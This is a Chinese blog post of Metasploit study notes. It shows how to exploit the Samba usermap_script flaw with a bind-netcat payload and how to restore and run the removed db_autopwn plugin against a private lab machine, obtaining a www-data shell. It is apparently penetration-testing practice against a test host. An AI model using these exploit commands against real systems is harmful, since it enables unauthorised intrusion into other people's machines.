metasploit學習筆記2

1.閱讀老資料的困惑

老資料里一般是根據BT5整理的,kali里的metasploit比較新,不太一樣,這里整理一下。

a)msfcli被整合進msfconsole的參數里:

老指令:

#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E

新指令:

#msfconsole?-x?"use?exploit/multi/samba/usermap_script;?set?RHOST 192.168.200.129;?set?PAYLOADcmd/unix/bind_netcat; [set?LHOST IP;] run"

b)msfpayload、msfencode被整合到msfvenom里:

老指令:

msfpayload -l ? ? ? ?#查看所有攻擊載荷

msfencode -l ? ? ? ? #查看所有編碼器

新指令只需一條指令即可:

msfvenom -l payloads,encoders

下圖是msfvenom的參數說明:

c)db_autopwn自動滲透腳本被刪除

據說是由于該腳本雖然使滲透傻瓜化,但是智能不高,并且造成的負載不小,容易被發現,所以刪掉了。

目前替代的方法是可以使用metasploit的一些自動化插件和腳本,但是更好的方法還是自己選擇合適的腳本和載荷,使負載變小,效率更高。

https://github.com/rapid7/metasploit-framework/tree/master/plugins

2.db_autopwn傻瓜化測試

雖然db_autopwn被刪掉了,但是可以手工恢復。

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

源代碼復制下來,保存為db_autopwn.rb文件,復制到/usr/share/metasploit-framwork/plugins/中,然后執行加載

#msf>load db_autopwn

滲透測試:

a)掃描測試機

#msf>db_nmap -v -A 192.168.200.129

--測試機的掃描結果會自動存放如Postgresql數據庫中

b)查看掃描結果

c)自動測試

#msf>db_autopwn -t -p -r -e?? ? ? ?? ----負載不小,1000多個腳本都會跑一遍,需要不少時間,好在成功了一個session。

d)連接會話并測試

會話連接已經成功,但user是www-data(敲錯的指令,請自動忽略),不是root,沒關系,至少證明db_autopwn還是管用的。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,423評論 2 22
  • Spring Cloud為開發人員提供了快速構建分布式系統中一些常見模式的工具(例如配置管理,服務發現,斷路器,智...
    卡卡羅2017閱讀 134,923評論 18 139
  • sqlmap用戶手冊 說明:本文為轉載,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,098評論 0 5
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協議:CC BY-NC-SA 4.0 簡介 這章...
    三月行者閱讀 1,918評論 2 7
  • 一 漏洞及漏洞發掘方法 漏洞,是指在硬件、軟件、協議實現或系統安全策略上存在缺陷,攻擊者能夠在未授權的情況下對系統...
    kaitoulee閱讀 15,343評論 0 30